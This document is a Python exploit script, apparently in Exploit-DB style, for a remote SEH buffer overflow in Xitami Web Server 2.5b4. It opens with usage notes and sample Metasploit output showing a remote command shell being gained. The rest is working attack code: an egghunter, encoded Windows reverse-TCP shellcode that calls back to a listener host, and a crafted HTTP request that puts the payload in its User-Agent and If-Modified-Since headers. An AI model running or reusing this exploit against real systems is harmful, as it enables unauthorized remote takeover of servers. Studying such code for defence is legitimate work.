# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (SEH + Egghunter) # Date: May 4, 2019 # Author: ElSoufiane # Version: 2.5b4 # Tested on: Windows Vista Ultimate (Build 6000) and Windows XP SP3 Professional # Discovered by: Krystian Kloskowski # # Set up a multi handler listener in MSFConsole # then run exploit # # root@f6c9fa91b403:~/XitamiWebServer# python exploit.py 192.168.1.149 # [+] Sending exploit payload... # # Check the MSFConsole listener # # msf5 exploit(multi/handler) > run # [*] Started reverse TCP handler on 0.0.0.0:5801 # [*] Encoded stage with x86/shikata_ga_nai # [*] Sending encoded stage (267 bytes) to 172.17.0.1 # [*] Command shell session 6 opened (172.17.0.2:5801 -> 172.17.0.1:39416) at 2019-05-04 00:17:55 +0000 # C:\Xitami> import socket import sys import struct if len(sys.argv) != 2 : print "[+] Usage : python exploit.py [VICTIM_IP]" exit(0) TCP_IP = sys.argv[1] TCP_PORT = 80 egg = "SOUFSOUF" nops = "\x90"*10 #msfvenom -p windows/shell/reverse_tcp LPORT=5801 LHOST=192.168.1.129 -f python -v shellcode -e x86/alpha_mixed shellcode = "\x89\xe0\xd9\xe5\xd9\x70\xf4\x5b\x53\x59\x49\x49" shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43" shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" shellcode += "\x69\x6c\x68\x68\x6c\x42\x63\x30\x37\x70\x63\x30" shellcode += "\x51\x70\x6b\x39\x6d\x35\x70\x31\x6f\x30\x70\x64" shellcode += "\x4e\x6b\x76\x30\x70\x30\x4e\x6b\x76\x32\x54\x4c" shellcode += "\x6e\x6b\x72\x72\x46\x74\x6c\x4b\x53\x42\x55\x78" shellcode += "\x34\x4f\x4e\x57\x42\x6a\x35\x76\x30\x31\x59\x6f" shellcode += "\x4e\x4c\x77\x4c\x70\x61\x31\x6c\x75\x52\x34\x6c" shellcode += "\x35\x70\x6b\x71\x38\x4f\x56\x6d\x47\x71\x4a\x67" shellcode += "\x4a\x42\x49\x62\x63\x62\x63\x67\x6e\x6b\x63\x62" shellcode += "\x52\x30\x4c\x4b\x53\x7a\x77\x4c\x6e\x6b\x70\x4c" shellcode += "\x72\x31\x31\x68\x59\x73\x30\x48\x53\x31\x68\x51" shellcode += "\x72\x71\x4e\x6b\x30\x59\x57\x50\x55\x51\x6e\x33" shellcode += "\x4c\x4b\x73\x79\x72\x38\x48\x63\x56\x5a\x62\x69" shellcode += "\x4c\x4b\x66\x54\x6c\x4b\x73\x31\x49\x46\x64\x71" shellcode += "\x4b\x4f\x6c\x6c\x5a\x61\x68\x4f\x66\x6d\x77\x71" shellcode += "\x69\x57\x30\x38\x4b\x50\x74\x35\x58\x76\x55\x53" shellcode += "\x71\x6d\x6b\x48\x55\x6b\x73\x4d\x44\x64\x32\x55" shellcode += "\x4a\x44\x43\x68\x4c\x4b\x70\x58\x31\x34\x65\x51" shellcode += "\x4a\x73\x62\x46\x4e\x6b\x54\x4c\x52\x6b\x6e\x6b" shellcode += "\x33\x68\x37\x6c\x43\x31\x4b\x63\x6e\x6b\x34\x44" shellcode += "\x6c\x4b\x43\x31\x4a\x70\x4c\x49\x37\x34\x37\x54" shellcode += "\x44\x64\x51\x4b\x73\x6b\x53\x51\x52\x79\x52\x7a" shellcode += "\x42\x71\x6b\x4f\x69\x70\x71\x4f\x43\x6f\x32\x7a" shellcode += "\x4c\x4b\x37\x62\x7a\x4b\x4e\x6d\x71\x4d\x55\x38" shellcode += "\x56\x53\x70\x32\x77\x70\x65\x50\x62\x48\x44\x37" shellcode += "\x42\x53\x74\x72\x63\x6f\x43\x64\x33\x58\x42\x6c" shellcode += "\x63\x47\x31\x36\x54\x47\x6d\x59\x6b\x58\x69\x6f" shellcode += "\x4e\x30\x4e\x58\x4c\x50\x67\x71\x47\x70\x67\x70" shellcode += "\x37\x59\x4a\x64\x31\x44\x56\x30\x70\x68\x55\x79" shellcode += "\x4f\x70\x30\x6b\x63\x30\x6b\x4f\x68\x55\x61\x7a" shellcode += "\x35\x5a\x72\x48\x39\x50\x79\x38\x45\x51\x4f\x71" shellcode += "\x52\x48\x46\x62\x43\x30\x32\x36\x39\x39\x6c\x49" shellcode += "\x59\x76\x36\x30\x46\x30\x36\x30\x32\x70\x51\x50" shellcode += "\x36\x30\x67\x30\x76\x30\x32\x48\x6a\x4a\x56\x6f" shellcode += "\x79\x4f\x39\x70\x59\x6f\x79\x45\x5a\x37\x70\x6a" shellcode += "\x46\x70\x71\x46\x63\x67\x30\x68\x6e\x79\x69\x35" shellcode += "\x44\x34\x30\x61\x59\x6f\x59\x45\x6d\x55\x49\x50" shellcode += "\x53\x44\x55\x5a\x79\x6f\x30\x4e\x66\x68\x53\x45" shellcode += "\x6a\x4c\x6a\x48\x52\x47\x73\x30\x33\x30\x73\x30" shellcode += "\x61\x7a\x55\x50\x33\x5a\x67\x74\x71\x46\x66\x37" shellcode += "\x62\x48\x45\x52\x68\x59\x4f\x38\x51\x4f\x59\x6f" shellcode += "\x6b\x65\x4f\x73\x7a\x58\x53\x30\x63\x4e\x57\x46" shellcode += "\x4c\x4b\x35\x66\x32\x4a\x63\x70\x72\x48\x63\x30" shellcode += "\x76\x70\x65\x50\x77\x70\x73\x66\x62\x4a\x37\x70" shellcode += "\x32\x48\x46\x38\x4e\x44\x76\x33\x79\x75\x79\x6f" shellcode += "\x5a\x75\x6e\x73\x76\x33\x52\x4a\x73\x30\x76\x36" shellcode += "\x42\x73\x32\x77\x33\x58\x45\x52\x78\x59\x78\x48" shellcode += "\x61\x4f\x39\x6f\x59\x45\x4d\x53\x49\x68\x45\x50" shellcode += "\x73\x4d\x61\x38\x71\x48\x62\x48\x55\x50\x53\x70" shellcode += "\x35\x50\x53\x30\x33\x5a\x45\x50\x76\x30\x33\x58" shellcode += "\x56\x6b\x34\x6f\x46\x6f\x34\x70\x4b\x4f\x78\x55" shellcode += "\x71\x47\x75\x38\x31\x65\x70\x6e\x52\x6d\x50\x61" shellcode += "\x4b\x4f\x79\x45\x33\x6e\x31\x4e\x4b\x4f\x44\x4c" shellcode += "\x76\x44\x56\x6f\x4e\x65\x72\x50\x79\x6f\x69\x6f" shellcode += "\x6b\x4f\x68\x69\x4d\x4b\x79\x6f\x79\x6f\x49\x6f" shellcode += "\x56\x61\x5a\x63\x71\x39\x69\x56\x51\x65\x69\x51" shellcode += "\x4f\x33\x6d\x6b\x5a\x50\x68\x35\x4e\x42\x50\x56" shellcode += "\x52\x4a\x57\x70\x36\x33\x69\x6f\x5a\x75\x41\x41" egghunter ="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"+"SOUF"+"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" nseh_jmp = "\xeb\xaa" #jmp back 84 bytes seh = "\x87\x1d\x40" # (xiwin32.exe) 0x00401d87 -> pop/pop/ret. ( Parial Overwrite ) payload = "A"*120 payload += egghunter payload += "A"*(190-len(payload)) payload += nseh_jmp payload += seh http_req = "GET / HTTP/1.1\r\n" http_req += "Host: "+ TCP_IP +"\r\n" http_req += "User-Agent: "+egg+nops+shellcode+"\r\n" http_req += "If-Modified-Since: Wed, " + payload + "\r\n\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TCP_IP, TCP_PORT)) print "[+] Sending exploit payload..." s.send(http_req) s.close()